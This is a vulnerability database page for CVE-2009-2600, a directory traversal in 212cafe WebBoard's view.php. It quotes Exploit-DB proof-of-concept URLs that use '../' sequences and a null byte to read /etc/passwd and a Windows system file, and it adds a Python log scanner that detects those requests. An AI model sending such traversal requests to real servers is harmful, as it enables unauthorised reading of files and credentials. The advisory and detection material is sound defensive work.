CVE-2009-2600
Published 2009-07-27
Priority P4 · 31 · medium · CVSS 2.0 base score 5.0
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
Exploit: EPSS 3.08% (86.0th percentile)
Multiple directory traversal vulnerabilities in view.php in Webboard 2.90 beta and earlier allow remote attackers to read arbitrary files via a .. (dot dot) in the topic parameter.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| akiva | webboard | <= 2.90 | — |
No detection rules found.
Exploit-DB
CVE-2009-3103 Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service
exploitdb·2010-05-07
Exploit-DB
CVE-2009-3547 Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1)
exploitdb·2009-11-03
Exploit-DB
CVE-2009-4660 BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)
exploitdb·2009-09-15
Exploit-DB
CVE-2009-3221 Audio Lib Player - '.m3u' Local Buffer Overflow (SEH)
exploitdb·2009-09-09
Exploit-DB
CVE-2009-2653 Microsoft Windows XP - 'win32k.sys' Local Privilege Escalation
exploitdb·2009-07-30
Exploit-DB
CVE-2009-2600 212Cafe WebBoard 2.90 Beta - 'view.php' Directory Traversal
exploitdb·2009-05-29
---
source: https://www.securityfocus.com/bid/44510/info
212cafe WebBoard is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to retrieve and read arbitrary files in the context of the webserver. Information harvested may aid in launching further attacks.
212cafe WebBoard 2.90 beta is vulnerable; other versions may also be affected.
http://www.example.com/webboard/view.php?topic=../../../../../../etc/passwd%00
http://www.example.com/webboard/view.php?topic=../../../../../../WINDOWS/system32/eula
Exploit-DB
CVE-2009-2600 212Cafe WebBoard 2.90 Beta - Remote File Disclosure
exploitdb·2009-05-29
---
Webboard <= v.2.90 beta Remote File Disclosure Vulnerability
Author: MrDoug
Email: mrdoug13 [at] gmail [dot] com
Greetz to all my friends
There are 3 vulnerable calls to fopen() in "/webboard/view.php". They are on lines 7, 109 and 113.
I have not actually read the source but based on tests I would GUESS they look something like this...
7: fopen('title/' . $_GET['topic'] . '.txt');
...
109: fopen('counter/read/' . $_GET['topic'] . '.txt');
...
113: fopen('counter/read/' . $_GET['topic'] . '.txt');
IMPORTANT: Due to the trailing ".txt", retrieving files with different extensions will be difficult unless you are able to get a null byte through without it being escaped.
Example 1: /webboard/view.php?topic=../../../../../.
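Added example, not code from the page, the SecurityFocus entry or the Webboard project: detection logic for the view.php traversal described in both entries above, including the null-byte trick that cuts off the appended ".txt", run over constructed access-log lines. The Common Log Format regex and the topic-id allow-list pattern are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Constructed Common Log Format lines (not real traffic); lines 2 and 3 mirror the two
# proof-of-concept URLs quoted on the page, line 3 with percent-encoded slashes.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Jul/2009:10:01:02 +0000] "GET /webboard/view.php?topic=1234 HTTP/1.1" 200 1843
10.0.0.9 - - [27/Jul/2009:10:01:07 +0000] "GET /webboard/view.php?topic=../../../../../../etc/passwd%00 HTTP/1.1" 200 912
10.0.0.9 - - [27/Jul/2009:10:01:09 +0000] "GET /webboard/view.php?topic=..%2F..%2F..%2FWINDOWS/system32/eula HTTP/1.1" 200 1200
10.0.0.7 - - [27/Jul/2009:10:02:00 +0000] "GET /webboard/index.php HTTP/1.1" 200 5120
"""
CLF_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
NUL_BYTE = "null byte"           # %00 would cut off the ".txt" that view.php appends
TRAVERSAL = "dot-dot traversal"  # "../" segments escape the title/ and counter/read/ dirs
BAD_ID = "topic is not a plain id"

def topic_is_safe(topic: str) -> bool:
    # Allow-list check a fixed view.php should apply before building a path.
    # The id format [A-Za-z0-9_-]{1,64} is an assumption, not Webboard's real one.
    return re.fullmatch(r"[A-Za-z0-9_-]{1,64}", topic) is not None

def classify_topic(target: str):
    # Return (decoded topic, reasons); (None, []) if not a view.php?topic= request.
    parts = urlsplit(target)
    values = parse_qs(parts.query, keep_blank_values=True).get("topic")
    if not parts.path.endswith("/view.php") or not values:
        return None, []
    # parse_qs decodes once, as PHP's $_GET does; the second decode is a detection
    # hedge that also flags double-encoded probes (%252e%252e%252f).
    topic = unquote(values[0])
    reasons = []
    if "\x00" in topic:
        reasons.append(NUL_BYTE)
    if ".." in topic.replace("\\", "/").split("/"):
        reasons.append(TRAVERSAL)
    if not reasons and not topic_is_safe(topic):
        reasons.append(BAD_ID)
    return topic, reasons

def scan_log(text: str):
    # Collect suspicious view.php requests; a 200 status means the file was served.
    hits = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if m:
            topic, reasons = classify_topic(m["target"])
            if reasons:
                hits.append({"ip": m["ip"], "status": int(m["status"]),
                             "topic": topic, "reasons": reasons})
    return hits
```

A hit with status 200 on a traversal topic is the case to escalate: the server answered the request rather than rejecting it.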
Exploit-DB
Microsoft Media Player - 'quartz.dll .mid' Denial of Service
exploitdb·2009-04-17
Exploit-DB
Microsoft Media Player - 'quartz.dll .wav' Multiple Remote Denial of Service Vulnerabilities
exploitdb·2009-04-17
Exploit-DB
CVE-2009-1029 POP Peeper 3.4.0.0 - Date Remote Buffer Overflow
exploitdb·2009-03-12
No writeups or analysis indexed.